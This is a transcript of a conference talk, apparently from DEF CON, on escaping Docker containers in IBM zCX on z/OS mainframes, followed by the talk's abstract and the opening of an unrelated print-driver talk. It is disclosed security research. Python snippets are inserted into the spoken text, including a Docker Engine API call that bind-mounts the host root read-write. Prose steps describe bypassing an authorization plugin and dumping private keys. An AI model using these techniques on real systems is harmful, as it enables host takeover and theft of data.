Linux hacking, which ended up becoming helpful for this project later. Because containers are made out of Linux features and mainframes use Unix file systems too. We jumped about whether or not we really could prove that guy wrong about Kubernetes being the next mainframe. But I didn't really think we would ever get to do our thing together, because, honestly, who puts containers on a mainframe? Well, joke was on me, because just a few months later, in fall 2019, IBM announced ZOS container extensions, which we will be referring to from here on out as ECX. So, we made it into a winter project. Joining forces and combining our very specific particular sets of skills, we were able to become the first people on the planet to escape a container on mainframe. And that was just getting started. This talk is about how we did that, to talk about friendship, collaboration, cross-disciplinary skill sharing, and figuring out how to escape containers on the moon. But first, a couple of things. It would violate the laws of physics and math to fit all of the technical background that I and myself have about our two niche disciplines into the amount of time that we have for this talk. However, we have not figured out how yet to do this, but we're making a lot of progress and we'll make a note of it for future talks. So, we're not doing that today. 
We encourage people that are interested in finding out more to check the resources in our reference sections, or if you're seeing this in person, come around and ask us a question. There's a lot of ways to attack this thing that we're not going to be covering today, but we reserve the right to not answer questions about those. If you're not here in person and you're watching this virtually an hour later, we're around the interwebs too. You could probably find us on Twitter. Probably Twitter, yeah. Speaking of which, we disclosed this to IBM, and IBM sent us a formal statement about it. To our knowledge, this is unprecedented, so we figured we would share it here. Great to have you. Yeah, I've disclosed vulnerabilities to IBM in the past, and friends of mine have also disclosed vulnerabilities to IBM specifically for System Z, and they never get talked about publicly. This is fantastic. I really appreciate this, and I hope they do this again in the future. So, yeah, that's pretty cool. Anyway, let's get to it. So, what is this thing? Containers on a mainframe? What? That's weird. First off, let's do some myth busting. Mainframes still exist. They're widely used, and the tech is more modern than you think. UNIX, or AIX, has been ported and running a mainframe since the early 90s, and now they're actual containers that run inside an address space on IBM's most prevalent mainframe OS, ZOS. Every one of you used a mainframe today, or in person, on the way here. If you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe. IBM's product name for this is ZCX. I'll explain what that is, but first, let's do some super basic mainframe primer. The mainframe we're talking and referring to today is IBM's flagship system Z. The operating system is known as ZOS, sometimes still called MPS by its old timers. It runs most of the mainframes on the planet, and it runs a unique architecture called Z architecture. Within this OS, the basic unit of user or process separation is known as an address space. ZCX is a custom hypervisor which emulates Z architecture and runs in its own address space on ZOS. Atop ZCX, there is a customized bare bones Linux image running Docker containers. IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers. So, Ian, what's a container? What is a container? First of all, let's talk about what it's not. A container is not the same thing as a virtual machine. Containers don't have their own kernels or standalone resources, at least most of the time. Containers share resources with each other and with their hosts. And unlike a virtual machine, if you kill a container process, you kill the entire container. Docker is the most common container engine, but it's not the only one, and they can vary pretty widely in implementation and behavior. Some of them even have hypervisors. ZCX does use Docker, though, so that's what we're going to be talking about today. This isn't the first time Docker containers have been run on mainframe computers. Docker has been running on bare metal Linux instances on mainframes for a minute, but that's just plain Linux. ZCX is different because it's the first time containers have been run on ZOS. But what is a container anyway? Well, a container isn't really a thing at all. They're basically a set of native Linux features that are put together in order to isolate a process. These features are C groups and namespaces. 
C groups determine what resources a process is permitted to use, like CPU and memory. Namespaces determine what a process is permitted to see, like directories and other processes. Together, C groups and namespaces make up what we call a container, which is really just an isolated process. Containers as a concept don't really exist in the Linux kernel. As far as the kernel is concerned, a container is no different than any other process running on the host. What this also means is that you can look at a container process like you could any other process on a Linux host. For this demo, we've already escaped to the ZCX host, so we're looking from there. So let's run a container with the name Honk command sleep 1312. The Honk isn't really necessary here. I just wanted to honk at you. If we list our containers, we can then see that container running. We can see this or any other container on the outside by running a PS command, which will show us containers running on the host alongside other processes. This command output will give you the process ID, the user running it, the PID namespace number, and the command line argument. If we want to take a look at the inside of the container, we can do so by looking at the proc NS folder for the process ID of that container. We found the PID of the container we just created in the PS command output we just ran. Let's take a closer look. We take a look here. We can see the C group at the top and the other namespaces on the bottom. All processes on X are made up of these namespaces as of kernel version 5.6. There's also a time namespace, but ZCX runs an old ass kernel. So this demo won't show you that one. Depending on the configuration and how the container was created. Some of these namespaces might be shared with the host and some might be unique to the container. We're not going to get into that here, but I recommend checking out the resources in the reference section to learn more. And that's it. Honestly, that might be the closest thing you're ever going to be able to get to being able to actually look at a container. Because that's all a container is a process made of a C groups and namespaces. Because containers do share resources with one another and their hosts containers present a wide and varied attack surface where if a container is compromised or misconfigured containers can compromise each other and their hosts. I just think they're neat. They're fun to break. So let's talk about breaking some. So how to break this thing. We approach ZCX from both ends using our respective knowledge and skill sets and we ended up taking ZCX completely apart from both the container side down into the mainframe and the mainframe side up into the containers. But first, before we did anything else, Chad set up a lab in the cloud. It's true. It was a complicated lab and it took a while to get it going. Let me explain. We had to build a cloud based ZOS environment with the latest ZCX code release. We used IBM's ZPDT that stands for Z Personal Development Tool. It's a virtualized platform that emulates Z hardware and runs a top Linux on top of the ZPDT. We loaded the newest ZOS version fully patched it and we're able to install and run ZCX in the cloud. So it looks a little bit like this. On top of Linux, which is a hosting provider, we run a Linux instance. Running in that Linux instance is ZPDT. On top of ZPDT hypervisor is ZOS. Within ZOS, there's an address space which runs the ZCX hypervisor. 
On top of that runs a Linux instance and in that runs Docker on Docker. And that's our research environment. Simple. Simple. Something along those lines, yeah. But to really be able to attack this, we needed to level up our skill sets. So we started out by cross-training each other. We set aside time to share skills and get each other up to speed and enough to be dangerous. Because for me, I didn't really know how to do anything with a mainframe. I couldn't spell Docker. But you could. And so we needed a little bit of help getting each other up to speed. So we started doing that. First thing, I took Chad's evil mainframe class. Chad's a really good teacher. It's a really good training. If you ever get the chance, I recommend it. It's, um, upward is such cons that you may or may not have heard of like Black Hat. Every once in a while. So the training is multiple days long. It goes over the history of mainframes, how everything works, and there's a CTF at the end. It was really good. I had a really good time at bed. Mainframes were brand new to me. I had never touched one before. I had never really had an occasion to. I'm used to bleeding edge cloud native text stacks. That old stuff never really comes into play for me at work. And while unit system services felt familiar enough, the older stuff was wild. I had never seen or dealt with architecture like that before. It was so foreign to me. It might as well have been made on the moon. I learned in systems. So it took me a little while longer to ramp up at first until I figured out how the whole thing worked together. Chad was very patient with this. I did get there eventually. I still call them mainframes though. Don't let Ian fool you. They picked up mainframes super fast, as good as anyone I've seen. The next thing was for me to train up on containers. And Ian helped me do the Secure Kubernetes CTF. I'd done only a little bit of work on Docker before, generally with CTFs and the like. It's always seemed like a little bit of magic to me. Working with Kubernetes and Dockers and the Secure Kubernetes CTF really helped me make some sense out of it. It did bring me back to my beginning mainframe days. I mean, this is complex and a really steep learning curve of a bunch of abstract concepts. I still put my overall understanding of Kubernetes at like 5% maybe, and containers somewhere in the neighborhood of maybe 30%. But working side by side with Ian has really helped me. They've always stopped to take the time to answer my questions, very detailed answers and examples. I definitely would not have wanted to embark on this without their guidance and patience. Don't let Chad fool you either. He took right to it because he already had a base of Linux knowledge and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast. It was really fun to watch. And it was really fun to get to come up with a curriculum to train you. Because I'm not a professional trainer. That wasn't really something I had done before. So it was cool to come up with one for you to teach everything. Or at least some of the things. Anyway, so after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product. Working together, but separately, we looked at our respective spaces. I looked at the containers. And I looked at the mainframes. And we tried to figure out how to get into it. 
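Before getting into how we attacked it, here is a small recap of the namespace inspection from the container demo earlier, done from Python instead of the shell. Given a container's PID on the host (found with ps, as above), its namespace IDs live under /proc/<pid>/ns; if one of them matches your own shell's, that namespace is shared with the host. This is a generic Linux sketch, not anything zCX-specific.

```python
# Inspect the namespace membership of a process (e.g. a container's PID found
# via `ps` on the host). Must be run as a user allowed to read /proc/<pid>/ns.
import os
import sys

def namespaces(pid):
    ns_dir = f"/proc/{pid}/ns"
    return {name: os.readlink(os.path.join(ns_dir, name))
            for name in sorted(os.listdir(ns_dir))}

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "self"
    mine = namespaces("self")
    theirs = namespaces(target)
    for name, ident in theirs.items():
        shared = " (shared with this shell)" if mine.get(name) == ident else ""
        print(f"{name:10} {ident}{shared}")
```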
On the mainframe end, I started with the initial provisioning of ZCX. This is where the primary image files live in the Unix subsystems on the mainframe. This is where you initiate ZCX, you provision it, and thus all of the artifacts that might be interesting to us are stored here. I uploaded these files used to build a root ZCX file system to a Linux box, and then I could take them apart with the proper tools. I fired up my exotic hacking tools like strings. I quickly discerned that the core of these images had two main parts, a whole bunch of bash scripts, and a bunch of Linux disk images. I extracted and examined these bash scripts alongside the job log, which shows messages as ZCX launches. Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up in the job log. What to do? Well, going back to the bash scripts, I looked and there was this super helpful line near the top of the first bootloader script that gave away the secret. Uncomment this line to enable debugging output. Thanks developers, who said being a hacker was difficult? All you have to do is just learn how to read. So I patched this binary, put it back on the mainframe, and repositioned a new ZCX. Fabulous. The job log spat out all the debug for all of the bootloader stages. There were so many messages, though, about keys and decryptions. My interest was peaked and the hunt was on. I patched the bash script up again and started looking for the initial decryption keys. I used the tried and true hacker skills of echo privatekey.pem, and I dumped the first of several encryption keys to the job log. However, I couldn't fully reverse the file system yet because despite being able to echo these keys in the initial bootloader processes to the job log, I couldn't actually find the keys in the file system. It's a pretty complex setup. So I could copy the keys one by one out of the job log, but this is a colossal pain in the ass. For the moment, I was stuck and I turned it back over to Ian. So looking at the container setup, I immediately saw some things that looked promising. First of all, the initial user was in the Docker group, which is a security hole so fundamental it literally comes with a warning label on every new install on ZOS. Somebody had to have seen this label and actively ignored it. Wow. Okay. So sweet. This looks good. Moving on. The container setup that ZCX has was Docker and Docker, which has known security holes, especially in certain configurations. There are a couple of approaches to Docker and Docker. It can mean running the Docker daemon inside a container, running inside another container, or it can mean running only the Docker CLI or the Docker SDK in a container and connecting it to the Docker daemon on the host. ZCX has a setup like the latter one. The approach to Docker and Docker that ZCX uses has a few different known drawbacks and some known security holes. Because in this setup, the container running the Docker CLI can manipulate any containers running on the host. It can, for example, remove containers. It can create privileged containers that allow equivalent access to the host. And ZCX Auth plugin, which was part of their security model, tried to account for this, but it didn't quite work entirely. Wait, what? I hadn't mentioned ZCX Auth plugin yet. What's up with this? Let's get there. So, I had looked at this and realized pretty quickly that it wasn't completely wide open. 
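For context, the kind of quick check that confirms the setup just described (initial user in the docker group, Docker socket reachable) can be sketched like this. The socket path is the standard default and would need adjusting for a non-default daemon configuration.

```python
# Quick recon: am I in the docker group, and can I reach the Docker socket?
import getpass
import grp
import os
import socket

SOCK = "/var/run/docker.sock"  # default daemon socket path
user = getpass.getuser()

in_docker_group = any(user in g.gr_mem for g in grp.getgrall()
                      if g.gr_name == "docker")
print(f"[*] {user} listed in docker group: {in_docker_group}")

s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
    s.connect(SOCK)
    print(f"[*] {SOCK} is reachable; the daemon will talk to us")
except OSError as err:
    print(f"[-] cannot reach {SOCK}: {err}")
finally:
    s.close()
```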
My first attempts of doing the sort of like most Bob standard, kind of like, okay, can I run a container as privileged in here? Can I execute a command as root? That kind of thing were blocked by this Docker authorization plugin that they were using called ZCX Auth plugin. ZCX Auth plugin did a few different things. Blocked for village containers, blocked executed commands as root. It also blocked mounting the host path as a read write by mount. Okay, fair enough. But I neither had to be a way to get into this because honestly, just look at that setup. And I wanted to figure out how the thing worked. So, as I do, I went to the box and as they often do, the box pointed the way. Quite literally, IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do, because they adversely affected security features or may compromise the product. Well then, thanks, IBM. I appreciate the tips. I was clearly going to have to try all of those immediately. The language and the docs at the time claimed that it was not possible to become root or access or modify the Linux host. But I knew that it was possible because they gave enough information away about their system to tell me so. Here's why. For one thing, what CCX off plugin blocks gave me very specific error messages. For another thing, the commands they were blocking through CCX off plugin were very specific, which pointed to a specific set of system configurations and also the possibility maybe that they might be blocking through pattern matching projects. Really? This was like trying to prevent SQL injections by banning the string or 1 equals 1. Without banning other things like, for example, and 1 equals 1, or, you know, parameterizing queries on the backend or anything else that 1 might do with SQL injections. Even if it is possible to prevent all attacks via trying to block known bad syntax, which I think most people here can probably guess that it's not, because there's not some ways to bypass that, it's also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant, and in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers. Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn't mount host resources. Okay, I already knew that the plugin tried to block that one. It also mentioned that VaRun Dockersock was read-only. Oh, that was the key to the front door. Let's talk about the Dockersockit for a minute. The Dockersockit is a known security hole if you leave it exposed to, for example, users in the Docker group. This gives that user root equivalent access to the host. And read-only for the Dockersockit is not a security boundary for a couple of reasons. One, you can make a whole volume read-only and all of the files in a folder read-only, and that doesn't actually affect sockets because sockets don't work that way. Also, the Dockersockit in particular has an API layer that you can make calls to and an entire Docker engine API for commands that you can execute to it while making those calls. And in the commands that the docs had mentioned blocking, they didn't mention any of the syntax around the engine API at all. So I made a curl call, creating a new container that mounted the host path as a read-write find map via engine syntax. And hey, the words! 
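That "talk to the Engine API directly" call looks roughly like the following sketch: raw HTTP over the Docker UNIX socket, creating a container whose HostConfig.Binds mounts the host's / read-write. This is a generic Docker Engine API example, not a zCX-specific exploit; the image name is a placeholder, and on zCX you would still be contending with the auth plugin and the user namespace remapping discussed next.

```python
# Create a container with the host filesystem bind-mounted at /host by
# speaking HTTP to the Docker Engine API over its UNIX socket directly,
# bypassing the docker CLI. Image name is a placeholder.
import json
import socket

def docker_api(method, path, body=None):
    payload = json.dumps(body).encode() if body is not None else b""
    req = (f"{method} {path} HTTP/1.1\r\nHost: docker\r\n"
           f"Content-Type: application/json\r\n"
           f"Content-Length: {len(payload)}\r\nConnection: close\r\n\r\n"
           ).encode() + payload
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect("/var/run/docker.sock")
    s.sendall(req)
    resp = b""
    while chunk := s.recv(4096):
        resp += chunk
    s.close()
    return resp.decode(errors="replace")

create = docker_api("POST", "/containers/create", {
    "Image": "ubuntu:latest",                 # placeholder image
    "Cmd": ["sleep", "1312"],
    "HostConfig": {"Binds": ["/:/host:rw"]},  # host filesystem at /host
})
print(create)  # raw HTTP response; on success the body contains the new Id
```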
So I knew that making calls could work and that binds was an option they missed. Sweet! But when I tried shrooting out into the host system, it didn't quite work the way that I wanted it to, because they had enabled username space remapping. What this means for my purposes is that once I was out of that name space, even though it said I was root, I couldn't really do anything meaningful in that name space. And they had locked down the pseudo-respline real hard, which was throwing weird permissions errors that I haven't seen before. So that was kind of odd. But, okay, maybe this one wasn't going to work. But at this point, I knew I was getting somewhere. I'm going to take a second here to explain username space remapping, because it's important. Linux namespaces provide isolation for running processes. They limit their access to system resources without the running process being aware of the limitations. You don't want to run your containers as a root user generally. It is not a secure thing to do. But sometimes for various system reasons, you get a container in which something has to run as root. So for those containers whose processes have to run as the root user within the container, you can remap this user via user namespace remapping to a less privileged user on the Docker host. The mapped user is assigned a range of UIDs, which function within the namespace as normal UIDs from 0 to 6.5536, but they have no privileges on those machine itself. This was why, even though I was theoretically running as UID 0, I couldn't really get anywhere. So knowing that the API calls could work to the engine API, but that username space remapping was kind of cramp in my style, I figured I'd try something else. I tried a username space host option through the API, because setting username space to host breaks username space remapping. This option was blocked by the plugin when I had tried it before in a Docker run command, but via the API, it worked. And this time, when I got in, I had full root access to all of those resources. Wow. This system really needed more defensive depth. It appeared to have been built upon the assumption that no one could ever become root on the host, like they really believed their own propaganda. So nothing was really locked down on the backend by that point. Once you were in, and once you were root, you could really do whatever. And this kind of fun, actually. I haven't really had that much fun running around an environment since early Kubernetes, which was similarly locked down. And I haven't gotten to do that. So in a while, since Kubernetes improved, that was fun for me. Anyway, the first thing I did once I had access to the host file system was look inside the root folder, because, you know, why not? And in the root folder, there was another folder called root keys. Well, that sounded great. Obviously, there's going to be something interesting in root keys. So I took a look in there, and I found a private key called IBM encapsulation privatePAM. I didn't quite know what that was, but I figured probably you did. So I went and handed it to Chad, figuring it might be useful. Chad then took the key, reverse engineered the cobalt or something, and then we had a system to look at. Right. So it wasn't exactly cobalt, but it was pretty complex. So it was like a Fortran, right? Exactly. It was Fortran. Thank you. It was not Fortran. Ian had found the key that I was looking for. 
And once I had the key, I could finish reverse engineering the root file system, and then I was able to look at this in more depth. The root file system bootloader processes are a myriad of Luxe encrypted file systems, init rem file systems, wrapped encryption keys, and a whole bunch of scripts putting it all together. After parsing it all and reassembling the unencrypted file systems on my Linux box, I had a moment and realized what this was. This is IBM's secure service container, or as it used to be called, Z appliance container infrastructure, ZACI. IBM's secure service container is an offering that they sell for Linux, Linux one, where it runs directly on bare metal IBM mainframes as a secure appliance. The file systems were littered with these acronyms. It dawned on me that what they had done was taken this, and this is why there was this wild maze of keys and encryption and scripts. They lifted this SSC, which normally has its initial decryption keys inside of hardware service module, and poured the whole thing to software on a disk. IBM normally builds these hardware enclaves, but it's harder to do that in the cloud. As it turns out, you can't actually lift and shift things into the sky. What we were coming to find out is that the security model in ZCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways. Since container shares resources with each other and their hosts, securing for containers requires a holistic approach. Any given container system is only as secure as any given part of its stack, really every part of its stack. You have to have defense and depth in every layer on a container system. Containers are literally made out of layers, but that means that you not only do you need to, but that you can do every little bit at a time. This is somewhat different security model than about on a mainframe. The mainframe security model is really granular. You can configure security on literally anything on the mainframe. However, it's also a monolith in its security model, and it can be very binary, like a light switch. Defense and depth on the mainframe can be really difficult if you have made any security configuration errors that would allow you to basically bypass all the security controls because you screwed up one or two really key important things. Mainframes are wild. They are wild. So the differing approaches to these two security models came into play with the way that ZCX got built. And these two combined in some somewhat unexpected ways. And that way they got combined led to some somewhat unexpected behavior for both of us. So we worked together, passing things back and forth. When either of us ran into the limits of our knowledge or saw something that didn't really make sense in the respective context we were used to, we would pass the problem to the other person, who would recognize it from their knowledge and context. And then we would do it again. So, back to the container system. I'm in there. I have full root access, but I was having a hard time understanding some behavior that I was running into. The Docker service kept throwing these weird system D errors I hadn't seen before, and my debugging tools weren't really helping in helping me figure out why. I wasn't really sure what was up with this. Meanwhile, on the mainframe side of things, I found this directory in Etsy system D services had these weird permissions on it. 
644, which any of you Linux people would know that 644 is kind of odd permissions for a directory because the execute bit isn't set. I found this because I was copying it from a Linux box to another directory, and my copy command threw an error because it couldn't copy that directory. Why would you want a non-executable directory? I'd never seen this before. I showed this to Ian with a comment about how strange I thought this was. Oh, huh. Okay. This partly explained the errors that I had been getting with the Docker service that I hadn't been able to figure out. Sort of. The permissions bit made sense in a container context. 644 are actually pretty standard permissions for the Docker service for compliance reasons. But this particular service didn't quite act the way that I would normally expect it to. The Docker service interacted with several other system D services. One of the services it was interacting with was called CCXoffplugin.service. So I took a look at that. I wanted to know how this plugin worked. And could we disable it? Docker authorization plugins aren't super commonly used, but the ones that I had seen, which were open source, generally behaved in pretty similar ways. This authorization plugin was different. It was closed source, and it interacted with system D as a service in a way that I hadn't seen before. It kept making these calls back and forth and running against a list of string matching text. What the fuck? This wasn't common behavior in container contexts at all. I had never seen such a thing. Ian explained this to me, and it occurred to me that what was going on here might have a similar corollary in the mainframe world. Specifically, mainframe exits. Let me explain. So within ZOS, there's a concept of an exit. What an exit is used for is if you want to do some really specific customization to some part of the system. An exit is literally a program that you write, usually an assembler or C, maybe C++, that is called from an API in some kind of a system routine. So the way it works is, let's take an example, a password processing routine. So Ian's going to change their password on the mainframe to Sparkle. So they type in the password Sparkle. The mainframe then says, okay, that's fine, but I see that there's an exit defined for password compliance. So it will call the program that I wrote, and in my program, the mainframe exit for password policy, I'm going to check all kinds of things. Is this word part of the dictionary list? Is it part of, is it the month? Is it the current year? Is it Ian's name? Things like that, that the system wouldn't normally check. And if it is okay, I'm going to pass back a return code that says, that's fine, Ian can you Sparkle? Or if it's not good, I'm going to say, no good, and I'm going to make them change their password back to something else. So I explained this to Ian. I said, I think what's happening here is that the programmers who know how to write exits to modify and control system behavior have written an exit in the ZCX auth plugin, and that's how they're trying to control the security of this product. Meanwhile, I was also looking at the ZCX auth plugin, but I was looking at the binary. And the first thing that I noticed was that it was huge. I mean, listen, normally on mainframes, things are built with like really tight assembly code or C code. The binaries, even for super complex mainframe systems are small. 
Because of this reason, take example of the nucleus on a mainframe, which is like kind of like the kernel, like the core bit that tells everybody what to do. It's maybe 50 mags on the mainframe. And the ZCX auth plugin is six mags. I started dumping it and looking at it with a hacksetter and a disassembler. And there's all kinds of calls in here to things that have nothing whatsoever to do with Docker or security. And I was like, what is going on here with this thing? So I called it back to Ian and I said, what is this? What's happening here? This is what I knew. It was a Go binary. There's a thing like that. They have a lot of dependencies. They make a lot of extra calls. That's normal for Go. At one point, I tried to Docker pull the image for Go-Tang and I crashed to our entire lab for disk space. Oops. I'm unfamiliar with these kinds of size constraints because I used to go. It's big. And so although I recognized the Go patterns in the code, that made sense to me. Some of what that code was doing looked kind of weird. It looked unfamiliar in a way that at this point I had learned to figure out, probably meant it was doing something kind of weirdly mainframe specific, despite the fact that it was a Go-length thing that I might otherwise be used to seeing. So at this point, I think we all knew this was clearly going to keep happening and we were going to need to get a deeper looking at system together. But to get into the systems deep as we wanted to, we were going to need persistence and tools. So we made a lab version of ZCX and we ripped out all the security features that IBM had left behind for us. We disabled the ZCX off plugin. We disabled user namespace equals remap. We made all of the read only mounts into read write mounts. We stored this file system onto a mainframe dataset. We added a debugger. We got apt up and running so we could update the software and install new applications and programs. And I even very proud of this figured out how to make SSH run on the root file system by copying the SSHB binaries and the corresponding libraries out of the Docker overlay file systems and running them in the root file system. So we had a direct factor into the root file system and could commence doing a little bit deeper research. We're still doing more with that. So where do we go from here? Well, we have a to do list. So we're still working on this project. We have a couple of obvious points to attack that we've already gathered some information about. And maybe some less obvious ones that we won't be talking about here. One of my favorite things is disassembling or reverse engineering code. So disassembling the ZCX off plugin is something that I'm absolutely looking forward to. However, it's written in Go and it's on an architecture using tools that were not really designed for that architecture. Let me explain. If you look at any of the open source tooling designed for mainframe, what you'll see is the architecture not listed as Z architecture, but listed as S390X architecture. They are the same thing in open source parlance S390X equals Z architecture. And even though I have things like optschdum and GDP and that sort of thing, when I disassemble these binaries, I'm going to end up with Z assembler code, not x86, not arm, but Z assembler code. So this is going to make it quite a bit more complicated to get through. But doing this, I think, is going to open up some obvious pointers to other security vulnerabilities. 
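Before breaking out a disassembler, a bit of triage helps confirm what you are actually holding: the ELF header tells you it is an s390x build, and the presence of a .gopclntab section is a reliable tell for a Go binary. A small sketch using pyelftools; the path to the plugin binary is a made-up placeholder.

```python
# Quick triage of a suspect binary: confirm the architecture and whether it
# looks like a Go build. The path is a hypothetical placeholder.
from elftools.elf.elffile import ELFFile  # pip install pyelftools

PATH = "./zcx_auth_plugin"

with open(PATH, "rb") as f:
    elf = ELFFile(f)
    print("class:  ", elf.header["e_ident"]["EI_CLASS"])  # e.g. ELFCLASS64
    print("machine:", elf.header["e_machine"])            # EM_S390 on s390x
    sections = [s.name for s in elf.iter_sections()]
    print("Go build:", ".gopclntab" in sections)          # Go runtime tables
```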
S390X architecture kept coming up and kept kind of throwing wrenches at things throughout this process because open source tooling sometimes supports S390X, but a lot of the time it doesn't. And honestly, for really valid reasons, open source developers, often who are working for free, are like, I don't work for IBM. Why would I work for something that is specific to IBM architecture? They're not paying me to do this. If you want people to do this, you can hire people to do this. And therefore, a lot of tools just aren't supported. That kept coming up as I kept running into like, okay, I'm going to go with this open source tool that I used to use it and having it be like, no, and have some sort of like terrible architecture failure like seven layers down the stack. It was kind of cool for learning and also paying the ass. Anyway, the real goal here for us would be a full hypervisor escape, which we believe can be done. CCX runs in an address space within ZOS, and that address space runs as authorized. Let me explain what this means. In a mainframe context, running as authorized means something specific. It's like security through the file system. So if you have a folder on Linux where anything that was in that folder automatically ran as UID0 as root, and not only that, it had root access to everything else in the system. That's actually how mainframe authorized address spaces work, which is wild. And what this means is that if we can get code execution in that address space, which frankly we believe that we can, we will be able to own the entire mainframe server, all of it, everything. We already know that there are direct memory links. IBM hopefully provided us this hideously ugly diagram in Comic Sans telling us so, and also we know because of this demo. Okay, just going to show you a quick demo on what we think might be possible in the future. We've done a little research on the shared memory links between CCX and ZOS. We know they exist. They're in some of the diagrams, and the documentation talks about it. But we found one of particular instance we'd like to show you now. So this demo is basically just giving you kind of a window into what might be possible by way of just kind of a fun demonstration. So if you log into our backdoor of our ZCX instance, so this is an SSH server that I booted up that's just running on the root level of the ZCX instance now, not bothering having to go back in through Docker and escape down to the root instance. We're just running an SSH daemon directly from it now to get in and out. It's part of our research environment. And I'm going to run some hackery commands from the CCX instance that I'm not going to show today. And just to give you an example of what we think is possible, let's log back into the mainframe system. So I'm going to go log in with my TSO ID onto our mainframe. And once I'm into TSO, I'm going to launch ISPF, which is kind of the green screen that everybody associates with mainframe, and is still probably the primary means of accessing the mainframe. And I'm going to go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named Moon, which is the ZCX server that we're looking at. So if I scroll down in this job log, and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in ZCX and my ability to write to memory inside of ZOS, placing the goose there at the end of that job log. 
So the demonstration here was basically just to show you that what we have is, what we have done is we've gone down through the Docker engine into the root Linux container, what's labeled here is Linux kernel, and that we know there are memory connections between that kernel through the ZCX hypervisor and to ZOS. And so our next project is really to try to figure out how to take advantage of that and do memory overwrites and gain access, then full access to an authorized address space within ZOS. Doing so would give us access to then all of the data, the programs and everything running on ZOS, which is ultimately the end goal. We couldn't wrap this up without discussing what we've learned. None of this or any of the future work that we will do would be possible without the sparkling partnership between Ian and myself. And I have to add a side note, but I think I've said sparkling in this talk more than I've ever said it in my entire life when I wasn't ordering a drink. It's all the glitter, right? That's right. It is indeed. There's a lot of glitter. Here's what I learned. In my niche world, I'm often the expert that people come to for input. I like this. I worked hard for it. I like the recognition that comes with this. I admit I find it hard to ask for help or admit that I don't really know where to start on a thing, especially if it's something that I could probably figure out on my own eventually, but maybe it would take me six months or a year. I don't know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you and being humble. This is hard. This is hard for me. And maybe it's hard for some of you, but it's been a really good experience. It's been really good for me. I like to encourage all of you watching this to do this too. Be vulnerable. Ask for help. Be humble. Even when it's hard. It's not only okay, but the outcome can and likely will be better than going it alone. I'd like to. I'm more used to asking for help. I work collaboratively a lot. I'm a member of a hacker crew called Seh Kank. So we work together all the time and admit when we don't know things and ask for help and do that a lot. So I was more used to that. What I wasn't used to was working with people who have a skill set that overlaps a little with mine. Because usually when I do collaborative work, I do it with other container people. And it's been really awesome to get to work with somebody who has knowledge that is so new to me and is so different from mine. I've gotten to learn so much from you and it's been great. And to me, I felt really inspired by that. I think we both have about what kinds of possibilities this could lead to for people. Because we don't always think about this, right? We hang out with people in our bubble. Maybe they do the same kind of things we do. Maybe they're a lot like us. And if we start working more closely with people who are really different from us, either in just their skill set or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that in a way that is really awesome. And if we all start doing that more, we can learn more from each other and we can build and break things more amazingly. And things that wouldn't have been possible before if we can work across like chasms in that way. So that's been really sweet. And we want to encourage you all to do that too. Because what can you do together? What can you build? 
What can you break? There are infinite possibilities. And we really want to see what you can do with that. We want to see what we often do with that. I don't think we do it as enough as in the industry. So, let's find each other. Let's make things happen. You and a small crew of committed friends can change the world. The secret is to really begin. Thank you. Thank you.
|
You've seen talks about container hacking. You've seen talks about mainframe hacking. But how often do you see them together? IBM decided to put containers on a mainframe, so a container hacker and a mainframe hacker decided to join forces and hack it. We became the first people on the planet to escape a container on a mainframe, and we’re going to show you how. Containers on a mainframe? For real. IBM zCX is a Docker environment running on a custom Linux hypervisor built atop z/OS - IBM’s mainframe operating system. Building this platform introduces mainframe environments to a new generation of cloud-native developers-and introduces new attack surfaces that weren’t there before. In this crossover episode, we’re going to talk about how two people with two very particular sets of skills went about breaking zCX in both directions, escaping containers into the mainframe host and spilling the secrets of the container implementation from the mainframe side. When two very different technologies get combined for the first time, the result is new shells nobody’s ever popped before. REFERENCES: Getting started with z/OS Container Extensions and Docker: https://www.redbooks.ibm.com/abstracts/sg248457.html The Path Less Traveled: Abusing Kubernetes Defaults: https://www.youtube.com/watch?v=HmoVSmTIOxM Attacking and Defending Kubernetes Clusters: A Guided Tour: https://securekubernetes.com Evil Mainframe penetration testing course :https://www.evilmainframe.com/ z/OS Unix System Services (USS): https://www.ibm.com/docs/en/zos/2.1.0?topic=system-basics-zos-unix-file z/OS Concepts: https://www.ibm.com/docs/en/zos-basic-skills?topic=zc-zos-operating-system-providing-virtual-environments-since-1960s Docker overview: https://docs.docker.com/get-started/overview/
|
10.5446/54213 (DOI)
|
Hello DEF CON, welcome to my talk, Bring Your Own Print Driver Vulnerability. In this talk, I'll discuss how a standard low-privilege user can install print drivers of their choosing, by design, on Windows systems. And I'll show how a local attacker can escalate to SYSTEM using a handful of different print drivers. Now I want to say up front that I won't be talking about PrintNightmare. PrintNightmare at this point is supposed to be a patched vulnerability, whereas what I'm going to talk about in this presentation is likely a built-in feature that will be difficult to patch. I also had to record this shortly after PrintNightmare's release, so even if I wanted to incorporate it, there really just wasn't enough time. This talk is roughly broken down into four parts. To start, I'll discuss some research that influenced this talk. Then we'll explore how a standard user can install a print driver. Next, we'll discuss actual exploitation, and I'll introduce a tool I wrote. Finally, I'll touch on detecting this sort of attack in the wild and mitigations that may prevent it. I'll also give a quick rundown of the vulnerability disclosure timelines associated with this talk. Now, in my opinion, slides are just an educational tool. While it's all well and good for me to present them, it's also important for the viewer to read them at their own pace, click links, read background material, and try out code snippets. There are also exploits associated with this talk, and because of all that, the code and slides are available at the following GitHub repository. The name of the repo will make a little bit more sense later on in the talk. Finally, before we get too far into it, I'd like to introduce myself. My name is Jake Baines, and I'm a vulnerability researcher. I like to use the handle albinolobster, which is why you'll see this little lobster almost everywhere I'm active online. My most well-known work is 